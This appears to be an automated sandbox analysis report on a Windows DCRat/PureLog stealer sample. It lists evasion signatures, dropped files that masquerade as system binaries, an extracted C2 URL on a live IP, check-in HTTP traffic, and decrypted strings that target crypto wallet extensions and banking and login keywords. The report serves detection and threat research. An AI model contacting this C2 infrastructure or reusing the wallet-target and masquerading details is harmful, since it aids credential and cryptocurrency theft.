
Windows Analysis Report
85D5ktqjpd.exe

Overview

General Information

Sample name: 85D5ktqjpd.exe (renamed because the original name is a hash value)
Original sample name: 97c2927135dd8fce7d56d5e1b2914bfa.exe
Analysis ID: 1589407
MD5: 97c2927135dd8fce7d56d5e1b2914bfa
SHA1: a6b5eb9800ea4fef6da44d306d743941143d87ea
SHA256: 21922a6cc19a72509d69fb830853a1e7e3af5b3e44134da7d1b65c3ee78f6037
Tags: DCRat, exe, user-abuse_ch

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Drops executable to a common third party application directory
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 85D5ktqjpd.exe (PID: 6944 cmdline: "C:\Users\user\Desktop\85D5ktqjpd.exe" MD5: 97C2927135DD8FCE7D56D5E1B2914BFA)
    • cmd.exe (PID: 4960 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\KgQDHOJvgq.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 1720 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • PING.EXE (PID: 5744 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
      • ctfmon.exe (PID: 3384 cmdline: "C:\Recovery\ctfmon.exe" MD5: 97C2927135DD8FCE7D56D5E1B2914BFA)
  • cleanup
{"C2 url": "http://91.211.249.46/3vmApi/8/poll2GeneratorPython/ImagepipeRequestsecureprocesswpPublic", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
Yara matches on the submitted sample:

Source | Rule | Description | Author | Strings
85D5ktqjpd.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
85D5ktqjpd.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Yara matches on dropped files (5 entries):

Source | Rule | Description | Author | Strings
C:\Program Files\Uninstall Information\XWWZQvSvBozA.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\Program Files\Uninstall Information\XWWZQvSvBozA.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Yara matches on process memory dumps:

Source | Rule | Description | Author | Strings
00000000.00000000.1688303891.0000000000D72000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000000.00000002.1741623674.00000000137A0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
Process Memory Space: 85D5ktqjpd.exe PID: 6944 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
Process Memory Space: ctfmon.exe PID: 3384 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

Yara matches on unpacked PEs:

Source | Rule | Description | Author | Strings
0.0.85D5ktqjpd.exe.d70000.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
0.0.85D5ktqjpd.exe.d70000.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

                            System Summary

Sigma rule match:

Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Users\user\Desktop\85D5ktqjpd.exe, ProcessId: 6944, TargetFilename: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe

Suricata IDS alert:

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-12T09:17:22.415092+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 91.211.249.46 | 80 | TCP


                            AV Detection

Source: 85D5ktqjpd.exe | Avira: detected
Source: C:\Program Files\Uninstall Information\XWWZQvSvBozA.exe | Avira: detection malicious, Label: HEUR/AGEN.1339906
Source: C:\Program Files\Uninstall Information\XWWZQvSvBozA.exe | Avira: detection malicious, Label: HEUR/AGEN.1339906
Source: C:\Users\user\AppData\Local\Temp\KgQDHOJvgq.bat | Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Program Files\Mozilla Firefox\uninstall\upfc.exe | Avira: detection malicious, Label: HEUR/AGEN.1339906
Source: C:\Users\user\Desktop\QitkawpP.log | Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe | Avira: detection malicious, Label: HEUR/AGEN.1339906
Source: C:\Users\user\Desktop\HpjdguSK.log | Avira: detection malicious, Label: HEUR/AGEN.1362695
Source: C:\Recovery\ctfmon.exe | Avira: detection malicious, Label: HEUR/AGEN.1339906
Source: C:\Users\user\Desktop\VWLjDtED.log | Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Users\user\Desktop\MdBcJrhy.log | Avira: detection malicious, Label: HEUR/AGEN.1300079
                            Source: 00000000.00000002.1741623674.00000000137A0000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://91.211.249.46/3vmApi/8/poll2GeneratorPython/ImagepipeRequestsecureprocesswpPublic", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
Source: C:\Program Files\Mozilla Firefox\uninstall\upfc.exe | ReversingLabs: Detection: 83%
Source: C:\Program Files\Uninstall Information\XWWZQvSvBozA.exe | ReversingLabs: Detection: 83%
Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe | ReversingLabs: Detection: 83%
Source: C:\Recovery\ctfmon.exe | ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Microsoft\XWWZQvSvBozA.exe | ReversingLabs: Detection: 83%
Source: C:\Users\user\Desktop\CJjejXjo.log | ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\CpWmZfmQ.log | ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\EzsmZyRR.log | ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\ICMDMDoc.log | ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\JVDTnZnD.log | ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\QitkawpP.log | ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\TEXjXBsl.log | ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\WuNaeyse.log | ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\XYySZcJy.log | ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\akEQlvtX.log | ReversingLabs: Detection: 15%
Source: C:\Users\user\Desktop\cLPQBZYm.log | ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\eWmRCrDn.log | ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\fKqanEzl.log | ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\haIyjaMG.log | ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\hyuiZSvj.log | ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\jAgQuBAe.log | ReversingLabs: Detection: 15%
Source: C:\Users\user\Desktop\jswyQSZZ.log | ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\oPZxcDoy.log | ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\oYwxMpHv.log | ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\pHpfyUNt.log | ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\rIogOAZx.log | ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\sdoGeuPL.log | ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\xJoFaSxi.log | ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\yWRfHaUA.log | ReversingLabs: Detection: 25%
Source: 85D5ktqjpd.exe | Virustotal: Detection: 62%
Source: 85D5ktqjpd.exe | ReversingLabs: Detection: 83%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\Desktop\TEXjXBsl.log | Joe Sandbox ML: detected
Source: C:\Program Files\Uninstall Information\XWWZQvSvBozA.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\VOtkXUXl.log | Joe Sandbox ML: detected
Source: C:\Program Files\Uninstall Information\XWWZQvSvBozA.exe | Joe Sandbox ML: detected
Source: C:\Program Files\Mozilla Firefox\uninstall\upfc.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\LnsTTQzV.log | Joe Sandbox ML: detected
Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\CJjejXjo.log | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\HpjdguSK.log | Joe Sandbox ML: detected
Source: C:\Recovery\ctfmon.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\HFlvrDZi.log | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\VWLjDtED.log | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\ICMDMDoc.log | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\MdBcJrhy.log | Joe Sandbox ML: detected
Source: 85D5ktqjpd.exe | Joe Sandbox ML: detected
                            Source: 00000000.00000002.1741623674.00000000137A0000.00000004.00000800.00020000.00000000.sdmpString decryptor: {"0":[],"90f3c523-0b6b-4956-a617-29c89ed8da84":{"_0":"mail.google.com;minecraft.net;steam.storepowered.com","_1":"mail.google.com;minecraft.net;steam.storepowered.com"},"d1159ac1-2243-45e3-9bad-55df4f7732e9":{"_0":"crypto;bank;authorization;account;password;login;register","_1":"1500","_2":"15","_3":"False"},"75400db8-4680-4af7-97bd-c8a76b65b9c4":{"_0":"bHYLmvnvgOjMnCFjcuPoYNCOvjCVWsqU","_1":"Unsupported","_2":"Incompatible version, run as administrator to allow automatic update","_3":"Error","_4":"OK"},"31395ecd-4eed-48b9-a47f-81dbcc84ccdf":{"_0":"True","_1":"nkbihfbeogaeaoehlefnkodbefgpgknn:MetaMask\nejbalbakoplchlghecdalmeeeajnimhm:MetaMask\nibnejdfjmmkpcnlpebklmnkoeoihofec:TronLink\nfnjhmkhhmkbjkkabndcnnogagogbneec:Ronin\nkjmoohlgokccodicjjfebfomlbljgfhk:Ronin\nfhbohimaelbohpjbbldcngcnapndodjp:BinanceChain\nbfnaelmomeimhlpmgjnjophhpkkoljpa:Phantom\nnphplpgoakhhjchkkhmiggakijnkhfnd:TONWeb\nffnbelfdoeiohenkjibnmadjiehjhajb:Yoroi\nakoiaibnepcedcplijmiamnaigbepmcb:Yoroi\nafbcbjpbpfadlkmhmclhkeeodmamcflc:MathWallet\nhnfanknocfeofbddgcijnmhnfnkdnaad:Coinbase\nimloifkgjagghnncjkhggdhalmcnfklk:TrezorPM\nilgcnhelpchnceeipipijaljkblbcobl:GAuth\noeljdldpnmdbchonielidgobddffflal:EOS\ncjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty\nlgmpcpglpngdoalbgeoldeajfclnhafa:SafePal\naholpfdialjgjfhomihkjbmgjidlcdno:Exodus","_2":"All Users","_3":"True"}}
                            Source: 00000000.00000002.1741623674.00000000137A0000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["n0mGv23O2HDyft3GCDNimJZOLdVMrtE1tYUrs5xYPygbzM6mpXxF71udbY5RgqhJDLEGZLXHQySym7Y8gsgU5832n1PT9f2iRXXnI0Nd9qyIi60dA7uyKMNFSLch5DHu","6221a3ce11ad15d7fc6881b7016cb4cb64da46691841946f781729876ccb1b99","0","mined","1","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
                            Source: 00000000.00000002.1741623674.00000000137A0000.00000004.00000800.00020000.00000000.sdmpString decryptor: [["http://91.211.249.46/3vmApi/8/poll2GeneratorPython/","ImagepipeRequestsecureprocesswpPublic"]]
Source: 85D5ktqjpd.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\85D5ktqjpd.exe | Directory created: C:\Program Files\Mozilla Firefox\uninstall\upfc.exe
Source: C:\Users\user\Desktop\85D5ktqjpd.exe | Directory created: C:\Program Files\Mozilla Firefox\uninstall\ea1d8f6d871115
Source: C:\Users\user\Desktop\85D5ktqjpd.exe | Directory created: C:\Program Files\Uninstall Information\XWWZQvSvBozA.exe
Source: C:\Users\user\Desktop\85D5ktqjpd.exe | Directory created: C:\Program Files\Uninstall Information\72f9cbbcf2062a
Source: C:\Users\user\Desktop\85D5ktqjpd.exe | Directory created: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe
Source: C:\Users\user\Desktop\85D5ktqjpd.exe | Directory created: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\24dbde2999530e
Source: 85D5ktqjpd.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: \??\C:\Windows\symbols\dll\System.pdbI | source: ctfmon.exe, 00000005.00000002.2972545766.000000001B860000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdbpdbtem.pdb | source: ctfmon.exe, 00000005.00000002.2974289113.000000001BE88000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll | source: ctfmon.exe, 00000005.00000002.2975498327.000000001BF7A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb | source: ctfmon.exe, 00000005.00000002.2975498327.000000001BF7A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb | source: ctfmon.exe, 00000005.00000002.2972545766.000000001B860000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Recovery\ctfmon.PDB^ | source: ctfmon.exe, 00000005.00000002.2972545766.000000001B8BF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb | source: ctfmon.exe, 00000005.00000002.2975498327.000000001BF7A000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\85D5ktqjpd.exe | File opened: C:\Users\user
Source: C:\Users\user\Desktop\85D5ktqjpd.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\Desktop\85D5ktqjpd.exe | File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\85D5ktqjpd.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\Desktop\85D5ktqjpd.exe | File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\85D5ktqjpd.exe | File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\Desktop\85D5ktqjpd.exe | Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh | 0_2_00007FFD9BA6CEBD
Source: C:\Recovery\ctfmon.exe | Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh | 5_2_00007FFD9BC8CEBD

                            Networking

Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49731 -> 91.211.249.46:80
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: Joe Sandbox View | ASN Name: ON-LINE-DATAServerlocation-NetherlandsDrontenNL
Source: global traffic | HTTP traffic detected: POST /3vmApi/8/poll2GeneratorPython/ImagepipeRequestsecureprocesswpPublic.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 | Host: 91.211.249.46 | Content-Length: 344 | Expect: 100-continue | Connection: Keep-Alive
Source: unknown | TCP traffic detected without corresponding DNS query: 91.211.249.46 (7 occurrences)
Source: unknown | HTTP traffic detected: POST /3vmApi/8/poll2GeneratorPython/ImagepipeRequestsecureprocesswpPublic.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 | Host: 91.211.249.46 | Content-Length: 344 | Expect: 100-continue | Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 12 Jan 2025 08:17:22 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not 
Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: ctfmon.exe, 00000005.00000002.2931880992.00000000035C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://91.211.249.46
Source: ctfmon.exe, 00000005.00000002.2931880992.00000000035C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://91.211.249.46/3vmApi/8/poll2GeneratorPython/
Source: ctfmon.exe, 00000005.00000002.2975498327.000000001BF3A000.00000004.00000020.00020000.00000000.sdmp, ctfmon.exe, 00000005.00000002.2931880992.00000000035C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://91.211.249.46/3vmApi/8/poll2GeneratorPython/ImagepipeRequestsecureprocesswpPublic.php
Source: 85D5ktqjpd.exe, 00000000.00000002.1738426023.000000000391F000.00000004.00000800.00020000.00000000.sdmp, ctfmon.exe, 00000005.00000002.2931880992.0000000003571000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: C:\Users\user\Desktop\85D5ktqjpd.exe | Code function: 0_2_00007FFD9B8BEBA0
Source: C:\Users\user\Desktop\85D5ktqjpd.exe | Code function: 0_2_00007FFD9B8B0D67
Source: C:\Users\user\Desktop\85D5ktqjpd.exe | Code function: 0_2_00007FFD9B8B7D6C
Source: C:\Users\user\Desktop\85D5ktqjpd.exe | Code function: 0_2_00007FFD9BA6005A
Source: C:\Users\user\Desktop\85D5ktqjpd.exe | Code function: 0_2_00007FFD9BA656A5
Source: C:\Recovery\ctfmon.exe | Code function: 5_2_00007FFD9BADEBA0
Source: C:\Recovery\ctfmon.exe | Code function: 5_2_00007FFD9BAD0D67
Source: C:\Recovery\ctfmon.exe | Code function: 5_2_00007FFD9BAD7D6C
Source: C:\Recovery\ctfmon.exe | Code function: 5_2_00007FFD9BAECBB5
Source: C:\Recovery\ctfmon.exe | Code function: 5_2_00007FFD9BAEA8D3
Source: C:\Recovery\ctfmon.exe | Code function: 5_2_00007FFD9BC943C8
Source: C:\Recovery\ctfmon.exe | Code function: 5_2_00007FFD9BC80078
Source: C:\Recovery\ctfmon.exe | Code function: 5_2_00007FFD9C412183
Source: Joe Sandbox View | Dropped File: C:\Users\user\Desktop\CJjejXjo.log B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
The following dropped .log files share the same static PE resource information: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970

Source: xJoFaSxi.log.0.dr
Source: uzSEaASh.log.0.dr
Source: nbVprpsA.log.0.dr
Source: lQyoqXNz.log.0.dr
Source: VOtkXUXl.log.0.dr
Source: TEXjXBsl.log.0.dr
Source: JVDTnZnD.log.0.dr
Source: tTxOTVxp.log.0.dr
Source: haIyjaMG.log.0.dr
Source: RYCtQXXs.log.0.dr
Source: rIogOAZx.log.0.dr
Source: oPZxcDoy.log.0.dr
Source: ypIvhwSa.log.0.dr
Source: pHpfyUNt.log.0.dr
Source: gdhqOayL.log.0.dr
Source: WuNaeyse.log.0.dr
Source: NLuKuVnw.log.0.dr
Source: HpjdguSK.log.0.dr
Source: FfNcgcmK.log.0.dr
Source: oYwxMpHv.log.0.dr
Source: WLUssUmg.log.0.dr
Source: MdBcJrhy.log.0.dr
Source: EzsmZyRR.log.0.dr
Source: CpWmZfmQ.log.0.dr
Source: cExRVzrV.log.0.dr
Source: hyuiZSvj.log.5.dr
                            Source: sdoGeuPL.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: ZRNAKZux.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: QitkawpP.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: HFlvrDZi.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: yWRfHaUA.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: psJpXhFT.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: fKqanEzl.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: dzUZnmUk.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: WbWKDcuD.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: VWLjDtED.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: LnsTTQzV.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: CJjejXjo.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: jswyQSZZ.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: ZJdigpUr.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
